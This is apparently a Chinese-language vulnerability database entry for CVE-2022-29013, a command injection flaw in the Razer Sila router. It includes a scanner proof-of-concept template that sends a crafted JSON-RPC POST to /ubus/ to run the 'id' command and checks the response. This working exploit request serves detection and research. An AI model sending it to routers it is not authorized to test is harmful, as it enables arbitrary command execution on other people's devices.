CVE-2022-29013: Razer Sila - 命令注入

日期: 2025-09-01 | 影响软件: Razer Sila | POC: 已公开

漏洞描述

Razer Sila 路由器 v2.0.441_api-2.0.418 命令参数中的命令注入允许攻击者通过精心设计的 POST 请求执行任意命令。

PoC代码[已公开]

id: CVE-2022-29013

info:
  name: Razer Sila - 命令注入
  author: Kevin Randall
  severity: high
  description: Razer Sila 路由器 v2.0.441_api-2.0.418 命令参数中的命令注入允许攻击者通过精心设计的 POST 请求执行任意命令。
  reference:
    - https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html
    - https://www.exploit-db.com/exploits/50865
    - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila

set:
  hosturl: request.url
rules:
  r0:
    request:
      method: POST
      path: /ubus/
      headers:
        Origin: "{{hosturl}}"
        Referer: "{{hosturl}}"
        X-Requested-With: XMLHttpRequest
      body: |
        {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-29013.yaml

相关漏洞推荐